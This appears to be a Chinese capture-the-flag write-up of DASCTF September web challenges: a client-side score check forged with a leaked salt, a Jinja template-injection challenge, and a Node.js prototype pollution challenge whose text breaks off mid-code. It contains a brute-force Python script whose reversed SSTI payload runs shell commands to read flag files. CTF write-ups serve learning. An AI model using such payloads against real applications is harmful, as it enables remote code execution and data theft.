DASCTF九月挑战赛复现-web
web
dino3d
进入题目先小玩一把
发现只要玩够这么多分就行,看看源码中的信息
在别的地方都没有信息,在一个js文件中好像有checkcode,进去看一下/js/build.min.js?patch=3x1
这里全都挤在一块,用工具将他变成人能看懂的语句美化代码
找到重要信息:
var salt = "_wElc03e";
var checkCode = "DASxCBCTF" + salt;//checkCode="DASxCBCTF_wElc03e";
在这里可以看到它对check.php进行了一次发包
那么我们只需要修改其中的分数,用它原来的方法对他进行一次发包就可以拿到flag
e就是分数,t就是我们的checkcode我们直接在页面中对他进行调用
拿到flag
Text Reverser
测试发现{{被过滤了,但是{%可以用可以用{%print()%}替换
因为他会反转,所以用python代码反转一下直接requests请求查看返回页面就行
后面就是寻找攻击载荷
直接挑攻击载荷爆破就行,给上python脚本
import requests
import timefor i in range(448):payload = "{%print(''.__class__.__base__.__subclasses__()[" + str(i) + "].__init__.__globals__['__builtins__']['eval'](\"__import__('os').popen('ca'+'t /f*').read()\"))%}"payload = payload[::-1]print(payload)url = 'http://420edf9a-46e5-42bd-b71a-a8b93def0907.node4.buuoj.cn:81/'data = {"text":payload}io = requests.post(url=url, data=data)print(i)time.sleep(0.2)if "{" in io.text:print(io.text)
拿到flag
cbshop
一道nodejs原型链污染题目
题目给出了源码,需要先登陆,如果使用正确的用户名和密码那么就会有9999块钱
const adminUser = {username: "admin",password: "
DASCTF九月挑战赛复现-web相关推荐
- 2022DASCTF Apr X FATE 防疫挑战赛复现
misc 第二题: wireshark打开直接搜字符串flag,发现4个字段含有flag,其中一个发现是zip文件,想把它提取出来, 将他数据导入一个新的zip文件,打开 在50段找到密码加密字段,找 ...
- 2022DASCTF Apr X FATE 防疫挑战赛 部分web复现
warmup-php 一个PHP代码审计审计题,给的代码量有点大,第一眼看下去容易劝退,分别有四个文件. Base.php<?phpclass Base {public function __g ...
- DASCTF X CBCTF 2022九月挑战赛 WriteUp
BBBB WRITEUP MISC easy_keyboard Sign_in ezflow Mask Reverse landing web dino3d Text Reverser PWN ez_ ...
- DASCTF X CBCTF 2022九月挑战赛 appetizer
程序分析 开启了沙盒ban了execve fun函数可以覆盖到rbp的位置 check函数会检查该位置是否有下面的字符串,小端序记得反过来写 白给了程序的一个地址(end),通过减去偏移拿到程序的基地 ...
- 掘安杯原题复现---Web签到题
flag到底在哪 先打开题目链接,看到页面上只有一个flag在这里的链接,点开后发现是404 notfound 二话不说用burpsuite开始抓包吧(这里抓取点击链接后的包!) 点击action选择 ...
- [DASCTF 7月赛] 复现
ez_forenisc 获取内存镜像的摘要信息,比如系统版本: imageinfo 查看进程信息: pslist python2 vol.py -f pc.raw --profile=Win7SP1x ...
- DASCTF x CBCTF 2022_Crypto复现
DASCTF x CBCTF 2022_Crypto复现 easySignin P r o b l e m Problem Problem A n a l y s i s Analysis Analy ...
- BJDCTF2nd部分题目复现
复现 web fake google old-hack duangShell Schrödinger 假猪套天下第一 XSS之光 elementmaster 文件探测 EasyAspDotNet m ...
- Incognito CTF 3.0部分WP及赛后复现
ictf部分wp及赛后复现 Web Invisible We found an illegal forum but are unable to access due to it being invit ...
最新文章
- 玩转百度即用API(2)——身份证查询
- docker centos 无法用systemctl 启动服务的问题
- 用于计算机视觉领域的python第三方库是什么_大量Python开源第三方库资源分类整理,含菜鸟教程章节级别链接...
- jQuery的Callback()方法
- oracle登录错误:ORA-28000: the account is locked 解决方法
- qrp文件如何用excel打开_问与答66: 如何不打开Excel文件删除行?
- JS基础--Date.parse(),Date.UTC()和Date.now()
- 25. 文件系统——源程序的编译安装(make,make install,ldd,ldconfig -v)
- 编码格式(UTF-8 与 ANSI)各种编码解码(encode、decode)
- 品尝阿里云容器服务:食用注意事项
- SQL Server 游标运用:查看所有数据库所有表大小信息(Sizes of All Tables in All Database)...
- 华为浏览器工具箱 html修改,华为电子文档浏览器(HedEx Lite)
- 8B10B编码表,8B10B编码表格,8B10B查表内容
- 讯飞语音 20006 错误 已解决
- 大连英语培训商务英语百家外语当今社会学习商务英语的重要性
- 基于深度强化学习的电子商务平台动态定价
- 成为高层管理的十二条秘诀 韩俊强的博客
- 改造WinRE 从隐藏分区安装Win7
- 作业2021-03-12
- 计算机组成原理基础知识试题及答案,[电脑基础知识]计算机组成原理试题库.doc...
热门文章